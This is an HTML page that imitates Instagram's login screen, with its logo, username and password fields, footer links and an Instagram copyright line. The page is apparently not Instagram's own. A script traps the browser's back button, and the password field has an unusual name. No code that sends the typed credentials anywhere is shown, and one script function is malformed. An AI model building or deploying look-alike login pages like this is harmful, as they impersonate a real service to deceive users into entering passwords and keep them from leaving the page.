<!DOCTYPE html>
<html lang="en">
<head>
  <base target="_top">
<script type="text/javascript">
    window.onload = function() {
  history.pushState(null, null, null);

  window.addEventListener("popstate", function (e) {
    history.pushState(null, null, null);
    return;
  });
}; 

function myopen1{
	window.open("https://www.instagram.com/")
};
</script>

    <meta name="viewport" content="width=device-width" >
	<meta charset="UTF-8">
  <style>
 @import url('https://fonts.googleapis.com/css?family=Roboto&display=swap');

*{
	margin: 0;
	padding: 0;
	box-sizing: border-box;
	outline: none;
	list-style: none;
	text-decoration: none;
	font-family: 'Roboto', sans-serif;
}

body{
	background: #fafafa;
	font-size: 14px;
}

.wrapper .header{
	max-width: 350px;
	width: 100%;
	height: auto;
	margin: 50px auto;
}

.wrapper .header .top,
.wrapper .signup{
	background: #fff;
    border: 1px solid #e6e6e6;
    border-radius: 1px;
    padding: 40px 40px 20px;
}

.wrapper .header .logo img{
	display: block;
	margin: 0 auto 35px;
}

.wrapper .header .form .input_field{
	margin-bottom: 5px;
}

.wrapper .header .form .input_field .input{
	width: 100%;
	background: #fafafa;
	border: 1px solid #efefef;
	font-size: 12px;
	border-radius: 3px;
	color: #262626;
	padding: 10px;
}

.wrapper .header .form .input_field .input:focus{
	border: 1px solid #b2b2b2;
}

.wrapper .header .form .btn{
	 width: 100%;
  background-color: #3897f0;
  border: 1px solid #3897f0;
  padding: 5px 12px;
  color: #fff;
  font-weight: bold;
  cursor: pointer;
  border-radius: 3px;
}

.wrapper .header .form .btn a{
	color: #fff;
	display: block;
}

.wrapper .header .or{
	display: flex;
	justify-content: space-between;
	align-items: center;
	height: 15px;
	margin: 15px 0 20px;
}

.wrapper .header .or .line{
	width: 105px;
	height: 2px;
	background: #efefef
}

.wrapper .header .or p{
	color: #999;
	font-size: 12px;
}

.wrapper .dif .fb{
	display: flex;
	justify-content: center;
	align-items: center;
}

.wrapper .dif .fb img{
	width: 16px;
	height: 16px;
}

.wrapper .dif  .fb p{
	color: #385185;
	font-weight: 500;
	margin-left: 10px;
}

.wrapper .dif .forgot{
	font-size: 12px;
	text-align: center;
	margin-top: 20px;
}

.wrapper .dif .forgot a{
	color: #003569;
}

.wrapper .signup{
	margin: 10px 0 20px;
	padding: 25px 40px;
	text-align: center;
	color: #262626;
}

.wrapper .signup a{
	color: #3897f0;
}

.wrapper .apps{
	text-align: center;
	color: #262626;
}

.wrapper .apps p{
	margin-bottom: 20px;
}

.wrapper .apps a img{
	width: 135px;
	height: 40px;
	margin: 0 5px;
}

.footer{
	max-width: 935px;
	width: 100%;
	margin: 0 auto;
	padding: 40px 0;
	display: flex;
	justify-content: space-between;
}

.footer .links ul li{
	display: inline-block;
	margin-right: 10px;
}

.footer .links ul li a{
	color: #003569;
	font-size: 12px;
}

.footer .copyright{
	color: #999;	
}
</style>

	</head>
<body>

<div class="wrapper">
	<div class="header">
		<div class="top">
			<div class="logo">
				<img src="https://github.com/codingmarket07/Instagram-Login-Page/blob/master/instagram.png?raw=true" alt="instagram" style="width: 175px;">
			</div>
			<div class="form">
				<div class="input_field">
					<input type="text" name="name" placeholder="Username" class="input">
				</div>
				<div class="input_field">
					<input type="password" name="q1n1" placeholder="Password" class="input">
				</div>
			<a href="https://www.instagram.com/"><button class="btn" type="submit" onclick="myopen1" >
        <div class="btn" >Login</div>
      </button></a>
      <div class="or">
				<div class="line"></div>
				<p>OR</p>
				<div class="line"></div>
			</div>
			<div class="dif">
				<div class="fb">
					<img src="https://github.com/codingmarket07/Instagram-Login-Page/blob/master/facebook.png?raw=true" alt="facebook">
					<p>Log in with Facebook</p>
				</div>
				<div class="forgot">
					<a href="https://www.instagram.com/">Forgot password?</a>
				</div>
			</div>
		</div>
		<div class="signup">
			<p>Don't have an account? <a href="https://www.instagram.com/">Sign up</a></p>
		</div>
		<div class="apps">
			<p>Get the app.</p>
			<div class="icons">
				<a href="https://www.instagram.com/"><img src="https://github.com/codingmarket07/Instagram-Login-Page/blob/master/appstore.png?raw=true" alt="appstore"></a>
				<a href="https://www.instagram.com/"><img src="https://github.com/codingmarket07/Instagram-Login-Page/blob/master/googleplay.png?raw=true" alt="googleplay"></a>
			</div>
		</div>
	</div>
	<div class="footer">
		<div class="links">
			<ul>
				<li><a href="https://www.instagram.com/">ABOUT US</a></li>
				<li><a href="https://www.instagram.com/">SUPPORT</a></li>
				<li><a href="https://www.instagram.com/">PRESS</a></li>
				<li><a href="https://www.instagram.com/">API</a></li>
				<li><a href="https://www.instagram.com/">JOBS</a></li>
				<li><a href="https://www.instagram.com/">PRIVACY</a></li>
				<li><a href="https://www.instagram.com/">TERMS</a></li>
				<li><a href="https://www.instagram.com/">DIRECTORY</a></li>
				<li><a href="https://www.instagram.com/">PROFILES</a></li>
				<li><a href="https://www.instagram.com/">HASHTAGS</a></li>
				<li><a href="https://www.instagram.com/">LANGUAGE</a></li>
			</ul>
		</div>
		<div class="copyright">
			© 2022 INSTAGRAM
		</div>
	</div>
</div>

</body>
</html>
